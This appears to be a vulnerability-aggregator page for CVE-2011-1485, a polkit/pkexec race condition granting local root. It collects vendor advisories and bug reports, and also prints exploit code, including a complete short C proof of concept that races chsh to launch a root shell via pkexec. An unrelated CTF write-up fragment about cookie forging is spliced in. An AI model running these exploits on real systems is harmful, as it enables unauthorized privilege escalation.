CVE-2011-1485
published 2011-05-31CVE-2011-1485: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from…
PriorityP337medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
5.25%
91.5th percentile
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | policykit-1 | < policykit-1 0.101-4 (bookworm) | policykit-1 0.101-4 (bookworm) |
| redhat | policykit | — | — |
CVSS provenance
nvdv2.06.9MEDIUMAV:L/AC:M/Au:N/C:C/I:C/A:C
osv6.9MEDIUM
vendor_debian6.9MEDIUM
vendor_redhat6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
polkit: polkitd/pkexec vulnerability
vendor_redhat·2011-04-19·CVSS 6.9
CVE-2011-1485 [MEDIUM] polkit: polkitd/pkexec vulnerability
polkit: polkitd/pkexec vulnerability
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
Ubuntu
PolicyKit vulnerability
vendor_ubuntu·2011-04-19
CVE-2011-1485 PolicyKit vulnerability
Title: PolicyKit vulnerability
Summary: Local users could gain root access by using the pkexec tool in PolicyKit.
Neel Mehta discovered that PolicyKit did not correctly verify the user
making authorization requests. A local attacker could exploit this to
trick pkexec into running applications with root privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Debian
CVE-2011-1485: policykit-1 - Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit...
vendor_debian·2011·CVSS 6.9
CVE-2011-1485 [MEDIUM] CVE-2011-1485: policykit-1 - Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit...
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
Scope: local
bookworm: resolved (fixed in 0.101-4)
bullseye: resolved (fixed in 0.101-4)
forky: resolved (fixed in 0.101-4)
sid: resolved (fixed in 0.101-4)
trixie: resolved (fixed in 0.101-4)
GHSA
GHSA-mjm4-2fq8-2392: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0
ghsa_unreviewed·2022-05-17
CVE-2011-1485 [MEDIUM] CWE-362 GHSA-mjm4-2fq8-2392: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
OSV
CVE-2011-1485: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0
osv·2011-05-31·CVSS 6.9
CVE-2011-1485 [MEDIUM] CVE-2011-1485: Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0
Race condition in the pkexec utility and polkitd daemon in PolicyKit (aka polkit) 0.96 allows local users to gain privileges by executing a setuid program from pkexec, related to the use of the effective user ID instead of the real user ID.
No detection rules found.
Exploit-DB
Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)
exploitdb·2014-10-20
CVE-2011-1485 Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)
Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 'Linux PolicyKit Race Condition Privilege Escalation',
'Description' => %q(
A race condition flaw was found in the PolicyKit pkexec utility and polkitd
daemon. A local user could use this flaw to appear as a privileged user to
pkexec, allowing them to execute arbitrary commands as root by running
those commands with pkexec.
Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
(10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
),
'License' => MSF_LICENSE,
'Author' =>
[
'xi4oyu', # exploit
'
Exploit-DB
pkexec - Race Condition Privilege Escalation
exploitdb·2011-10-08·CVSS 6.9
CVE-2011-1485 [MEDIUM] pkexec - Race Condition Privilege Escalation
pkexec - Race Condition Privilege Escalation
---
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx [email protected] * Have fun~
¡Á U can reach us @ http://www.wooyun.org :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int main(int argc,char *argv[], char ** envp)
{
time_t tim_seed1;
pid_t pid_seed2;
int result;
struct stat stat_buff;
char * chfn_path = "/usr/bin/chfn";
char cmd_buff[4096];
char * pkexec_argv[] = {
"/usr/bin/pkexec",
"/bin/sh",
"-c",
cmd_buff,
NULL
};
int pipe1[2];
int pipe2[2];
int pipe3[2];
pid_t pid,pid2 ;
char * chfn_argv[] = {
"/usr/bin/chfn",
NULL
};
char buff[8];
char read_buff[4096];
char real_path
Exploit-DB
PolicyKit polkit-1 < 0.101 - Local Privilege Escalation
exploitdb·2011-10-05·CVSS 6.9
CVE-2011-1485 [MEDIUM] PolicyKit polkit-1 < 0.101 - Local Privilege Escalation
PolicyKit polkit-1
#include
#include
#include
#include
#include
int main(int argc, char **argv)
{
printf("=============================\n");
printf("= PolicyKit Pwnage =\n");
printf("= by zx2c4 =\n");
printf("= Sept 2, 2011 =\n");
printf("=============================\n\n");
if (fork()) {
int fd;
char pid_path[1024];
sprintf(pid_path, "/proc/%i", getpid());
printf("[+] Configuring inotify for proper pid.\n");
close(0); close(1); close(2);
fd = inotify_init();
if (fd < 0)
perror("[-] inotify_init");
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(1);
printf("[+] Launching pkexec.\n");
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
Metasploit
Linux PolicyKit Race Condition Privilege Escalation
metasploit
Linux PolicyKit Race Condition Privilege Escalation
Linux PolicyKit Race Condition Privilege Escalation
A race condition flaw was found in the PolicyKit pkexec utility and polkitd daemon. A local user could use this flaw to appear as a privileged user to pkexec, allowing them to execute arbitrary commands as root by running those commands with pkexec. Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1 (10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
CTF
AdventOfCyber2 / README
ctf_writeups
AdventOfCyber2 / README
# Day 1
* We can go onto the website and regsiter/login.
* Once we do that, viewing the cookies shows us a hexidecimal value named "auth"
* We can decode that with `echo | xxd -r -p`
* We want to log in to "santa", so let's switch our user for that with the following command:
* `echo | xxd -r -p | sed s//santa/g | xxd -p | tr -d '\n'`
* Once we replace the value of the previous cookie with the new one in the "Applications->Cookies" section on chrome developer tools, we get authenticated as santa and can turn on all the controls
* The flag is `THM{MjY0Yzg5NTJmY2Q1NzM1NjBmZWFhYmQy}`
# Day 2
* My ID number was `ODIzODI5MTNiYmYw`
* We can then go to the website and enter that in as a GET parameter:
* `http://10.10.71.84/?id=ODIzODI5MTNiYmYw`
* There's a place images, so let's try to upload a
Bugzilla
CVE-2011-1485 polkitd/pkexec vulnerability [fedora-all]
bugzilla·2011-04-19·CVSS 6.9
CVE-2011-1485 [MEDIUM] CVE-2011-1485 polkitd/pkexec vulnerability [fedora-all]
CVE-2011-1485 polkitd/pkexec vulnerability [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=692922
Please note: this issue affects multiple supported versions
Bugzilla
CVE-2011-1485 polkit: polkitd/pkexec vulnerability
bugzilla·2011-04-01·CVSS 6.9
CVE-2011-1485 [MEDIUM] CVE-2011-1485 polkit: polkitd/pkexec vulnerability
CVE-2011-1485 polkit: polkitd/pkexec vulnerability
I was contacted privately about a potential vulnerability in polkitd and pkexec.
Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)'ing /proc/PID.
The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id.
While there's a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be - namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinkin
http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058752.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-May/059859.htmlhttp://secunia.com/advisories/48817http://security.gentoo.org/glsa/glsa-201204-06.xmlhttp://securityreason.com/securityalert/8424http://www.debian.org/security/2011/dsa-2319http://www.mandriva.com/security/advisories?name=MDVSA-2011:086http://www.redhat.com/support/errata/RHSA-2011-0455.htmlhttp://www.ubuntu.com/usn/USN-1117-1https://bugzilla.redhat.com/show_bug.cgi?id=692922http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058752.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2011-May/059859.htmlhttp://secunia.com/advisories/48817http://security.gentoo.org/glsa/glsa-201204-06.xmlhttp://securityreason.com/securityalert/8424http://www.debian.org/security/2011/dsa-2319http://www.mandriva.com/security/advisories?name=MDVSA-2011:086http://www.redhat.com/support/errata/RHSA-2011-0455.htmlhttp://www.ubuntu.com/usn/USN-1117-1https://bugzilla.redhat.com/show_bug.cgi?id=692922
2011-05-31
Published